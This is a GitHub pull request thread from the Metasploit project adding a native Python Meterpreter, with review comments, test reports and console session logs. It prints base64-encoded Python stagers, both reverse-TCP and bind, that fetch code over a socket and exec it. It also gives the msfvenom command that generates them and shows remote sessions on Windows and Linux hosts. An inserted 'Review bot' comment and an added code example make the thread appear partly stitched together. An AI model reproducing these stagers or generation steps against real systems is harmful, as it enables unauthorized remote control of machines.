
Python Meterpreter #2244

Merged
merged 10 commits into from Aug 30, 2013

6 participants
@zeroSteiner
Contributor

zeroSteiner commented Aug 19, 2013

This PR adds support for a native Python meterpreter.

The meterpreter has been tested on:

  • Python 2.4, 2.6 & 2.7 on Linux
  • Python 2.6 on OSX
  • Python 2.5, 2.6 & 2.7 on Windows

The stagers are compatible with Python 3.x; however, the meterpreter itself is not, due to the explicit encoding not being supported by older versions of Python. Almost all of the code was written using the PHP meterpreter as a guide.

msf3-git (S:1 J:0)  exploit(handler) > sessions

Active sessions
===============

  Id  Type                       Information              Connection
  --  ----                       -----------              ----------
  1   meterpreter python/python  Administrator @ Exploit  192.168.90.1:4444 -> 192.168.90.133:1030 (192.168.90.133)

msf3-git (S:1 J:0)  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer     : Exploit
OS           : Windows XP 5.1.2600
Architecture : x86
Meterpreter  : python/python
meterpreter > 
@limhoff-r7

Why is 'Python' in the class name twice?

limhoff-r7 replied Aug 14, 2013

Underscores should not be used in Ruby class names by convention. The standard translation from underscore file name like 'meterpreter_python' would be the camelcase MeterpreterPython for a class name.

Owner

zeroSteiner replied Aug 14, 2013

I named it because of lib/msf/base/sessions/meterpreter_php.rb line rapid7#13, and I was trying to be consistent. The other meterpreter_* files also use names which begin with Meterpreter_; should I still change this?

limhoff-r7 replied Aug 15, 2013

@jlee-r7 is this non-Ruby standard naming scheme required for the meterpreter sessions to load and run correctly?

@limhoff-r7

Please sort your imports so it's easier to check if a library is already imported when modifying the code.

Owner

zeroSteiner replied Aug 15, 2013

I just pushed a commit which sorts these alphabetically, thanks for the feedback.

@@ -84,6 +84,7 @@
ARCH_JAVA = 'java'
ARCH_RUBY = 'ruby'
ARCH_DALVIK = 'dalvik'
ARCH_PYTHON = 'python'
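Review bot: only the bare constant ARCH_PYTHON = 'python' is added here; if this file, or code that validates or filters payloads, also keeps an aggregate list of all ARCH_* values, that list needs the new entry in the same change, and as noted in the thread the architecture list in metasploit-model's lib/metasploit/model/architecture.rb also lacks 'python' (and 'dalvik'), so the two should be updated together to keep module caching consistent.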

@KronicDeth

KronicDeth Aug 19, 2013

I'm going to have to add this to https://github.com/rapid7/metasploit-model/blob/feature/module-caching/lib/metasploit/model/architecture.rb. Looks like I need to add 'dalvik' too since android meterpreter's been merged since I started the module-caching rework.

@Meatballs1

Contributor

Meatballs1 commented Aug 21, 2013

I was unsuccessful testing this on Windows x64 with 2.7.3 or with the version of Python bundled with Kali.

Generated payload with generate -f blah -t raw

It connected to the stager, but the stage didn't appear to execute and Python just hung indefinitely.

Are there steps to build/run this?

@zeroSteiner

Contributor

zeroSteiner commented Aug 21, 2013

I just checked it on x86 Kali running Python 2.7.3, just like you did. Are you using the 32-bit version of Kali?
Also, if Python just hangs, could you send me the stack trace that's printed when you hit Ctrl-C?

I'll look into the Windows one as well.

msf3-git (S:0 J:0) > use payload/python/meterpreter/reverse_tcp 
msf3-git (S:0 J:0)  payload(reverse_tcp) > show options 

Module options (payload/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

msf3-git (S:0 J:0)  payload(reverse_tcp) > set LHOST 192.168.90.1
LHOST => 192.168.90.1
msf3-git (S:0 J:0)  payload(reverse_tcp) > generate -f blah -t raw
[*] Writing 277 bytes to blah...
msf3-git (S:0 J:0)  payload(reverse_tcp) >

Then on Kali:

python Desktop/blah

Then back on the attackers machine:

msf3-git (S:0 J:0)  exploit(handler) > exploit

[*] Started reverse handler on 192.168.90.1:4444 
[*] Starting the payload handler...
[*] Sending stage (13751 bytes) to 192.168.90.129
[*] Meterpreter session 1 opened (192.168.90.1:4444 -> 192.168.90.129:50614) at 2013-08-21 09:23:11 -0400

meterpreter > sysinfo
Computer     : kali
OS           : Linux 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8
Architecture : i686
Meterpreter  : python/python
meterpreter > 
@zeroSteiner

Contributor

zeroSteiner commented Aug 21, 2013

Same thing for 64-bit Python 2.7.2 in 64-bit Windows 7 SP1:

msf3-git (S:1 J:0)  exploit(handler) > exploit

[*] Started reverse handler on 192.168.90.1:4444 
[*] Starting the payload handler...
[*] Sending stage (13751 bytes) to 192.168.90.149
[*] Meterpreter session 3 opened (192.168.90.1:4444 -> 192.168.90.149:13464) at 2013-08-21 09:37:05 -0400

meterpreter > sysinfo
Computer     : SWIN7TB92
OS           : Windows 7 6.1.7601
Architecture : x86_64
Meterpreter  : python/python
meterpreter > 

When you tested it on Windows was your python installation 32-bit or 64-bit?

@Meatballs1

Contributor

Meatballs1 commented Aug 21, 2013

AFAIK it just said KeyboardInterrupt on the exec function. x86 Kali VM image; I would have to double-check which Python architecture it was on Windows.

@zeroSteiner

Contributor

zeroSteiner commented Aug 21, 2013

Would it be possible for you to please send me the output of what you had tried? I'm having difficulty reproducing this error and some console output would help me a lot.

@todb

Contributor

todb commented Aug 21, 2013

Hey @zeroSteiner, btw, I'm really excited about a python Meterpreter, especially given that modern Linux systems all tend to ship with python by default for config reasons. So, thanks tons for your work on this, and I hope we can land this soon.

@limhoff-r7

Contributor

limhoff-r7 commented Aug 21, 2013

Python (and Perl) are part of the LSB (Linux Standard Base) as interpreted languages: https://wiki.linuxfoundation.org/en/LsbInterpretedLanguage. Python was added to LSB 3.2 and Perl has been in since then too. LSB 3.2 was released in 2008.

@limhoff-r7

Contributor

limhoff-r7 commented Aug 21, 2013

Java was added (though optional) to LSB 4.0: http://www.linuxbase.org/navigator/browse/intlang.php

@Meatballs1

Contributor

Meatballs1 commented Aug 21, 2013

Just been able to retry it, same payload .py. Fresh startup of metasploit:

use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.1.121

Worked fine on both Kali x86 Python 2.7.3 and Windows 7 x64 Python 2.7.3 x64.

No idea what went wrong last night!

Bind payload however:

msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Sending stage (13751 bytes) to 192.168.1.121
[*] 192.168.1.121 - Meterpreter session 6 closed.  Reason: Died
[*] Meterpreter session 6 opened (127.0.0.1 -> 127.0.0.1) at 2013-08-21 19:40:02 +0100
[-] Failed to load extension: No response was received to the core_loadlib request.

[-] Invalid session id


root@kali:~# python pbind.py 
Traceback (most recent call last):
  File "pbind.py", line 1, in <module>
    import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5iaW5kKCgnJyw0NDQ0KSkKcy5saXN0ZW4oMSkKYyxhPXMuYWNjZXB0KCkKbD1zdHJ1Y3QudW5wYWNrKCc+SScsYy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1jLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6Y30pCg=='))
  File "<string>", line 7, in <module>
socket.error: [Errno 107] Transport endpoint is not connected


Windows:

msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Sending stage (13751 bytes) to 192.168.1.4
[*] Meterpreter session 9 opened (192.168.1.121:46923 -> 127.0.0.1) at 2013-08-21 19:44:19 +0100
[-] Failed to load extension: No response was received to the core_loadlib request.
[*] 192.168.1.4 - Meterpreter session 9 closed.  Reason: Died

[-] Invalid session id


C:\Share>python pbind.py
Traceback (most recent call last):
  File "pbind.py", line 1, in <module>
    import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZX
Quc29ja2V0KDIsMSkKcy5iaW5kKCgnJyw0NDQ0KSkKcy5saXN0ZW4oMSkKYyxhPXMuYWNjZXB0KCkKbD
1zdHJ1Y3QudW5wYWNrKCc+SScsYy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZC
khPWw6CglkKz1jLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6Y30pCg=='))
  File "<string>", line 7, in <module>
socket.error: [Errno 10057] A request to send or receive data was disallowed bec
ause the socket is not connected and (when sending on a datagram socket using a
sendto call) no address was supplied

Note the connection shows 127.0.0.1 (not sure if it is significant); it is binding to 0.0.0.0.

@zeroSteiner

Contributor

zeroSteiner commented Aug 21, 2013

@Meatballs1 thanks for testing it again! That issue you were experiencing was the result of a typo I had made in the bind stager causing python to read from the server socket instead of the client.
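The framing the stager in the tracebacks above relies on, and the typo just described, as an added example that is not code from the PR: a 4-byte big-endian length prefix followed by the body, which must be read from the accepted connection in a loop, not from the listening socket. STAGE, the loopback helper and the function names are constructed for this illustration, and the body is inert bytes rather than a stage.

```python
import errno
import socket
import struct
import threading
STAGE = b"\x90" * 10000  # constructed stand-in body, larger than one recv(4096)

def send_framed(sock, body):
    """Handler side: 4-byte big-endian length ('>I') followed by the body."""
    sock.sendall(struct.pack(">I", len(body)) + body)

def recv_exact(sock, n):
    """Read exactly n bytes, raising if the peer closes early."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(min(4096, n - len(buf)))
        if not chunk:
            raise ConnectionError("peer closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return buf

def recv_framed(sock):
    """Receiver side, corrected: read the length, then loop until it has all arrived."""
    (length,) = struct.unpack(">I", recv_exact(sock, 4))
    return recv_exact(sock, length)

def bind_and_receive(read_from_listener=False):
    """Bind a loopback listener, let a thread act as the handler and read one frame;
    read_from_listener=True reproduces the reported typo (recv on the listening socket)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    def handler():
        with socket.create_connection(srv.getsockname()) as h:
            send_framed(h, STAGE)
    t = threading.Thread(target=handler)
    t.start()
    conn, _ = srv.accept()
    try:
        return recv_framed(srv if read_from_listener else conn)
    finally:
        t.join()
        conn.close()
        srv.close()

def typo_is_enotconn():
    """True when the buggy read fails with ENOTCONN, as in the Linux traceback."""
    try:
        bind_and_receive(read_from_listener=True)
    except OSError as exc:
        return exc.errno == errno.ENOTCONN
```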

@Meatballs1

Contributor

Meatballs1 commented Aug 21, 2013

Cool that did the trick, bind payload working for me now.

@Meatballs1

Contributor

Meatballs1 commented Aug 30, 2013

Things like upload and cat don't work on Windows and error with [-] core_channel_open: Operation failed: 1, but it doesn't crash and can drop down to a shell if needed, so it's pretty usable. They work fine on Linux.

@Meatballs1 Meatballs1 merged commit f490277 into rapid7:master Aug 30, 2013

1 check passed

default The Travis CI build passed

Meatballs1 added a commit that referenced this pull request Aug 30, 2013

@zeroSteiner

Contributor

zeroSteiner commented Aug 30, 2013

Thanks @Meatballs1 I'm looking into the issue with files on Windows, it looks like they are trying to be opened with a mode of 'rbb' which is causing the open call to fail.

I'll try to put together a PR soon which will fix this issue.

@phillips321


phillips321 commented Sep 6, 2013

Is there any reason why you have to create the payload from msfconsole and not the standard way of using msfvenom?

root@kali:~# msfvenom --help-formats
Executable formats
dll, exe, exe-service, exe-small, exe-only, elf, macho, vba, vba-exe, vbs, loop-vbs, asp, aspx, war, psh, psh-net
Transform formats
raw, ruby, rb, perl, pl, bash, sh, c, csharp, js_be, js_le, java, python, py, powershell, ps1, vbscript, vbapplication

@zeroSteiner

Contributor

zeroSteiner commented Sep 6, 2013

@phillips321 you can create the payload from msfvenom.
This works just fine for me:

msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=192.168.90.1 LPORT=1234
import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))
@phillips321


phillips321 commented Sep 6, 2013

Ah ok, thanks for this tip :-) 👍

@zeroSteiner zeroSteiner deleted the zeroSteiner:python-meterpreter-dev branch Feb 6, 2014
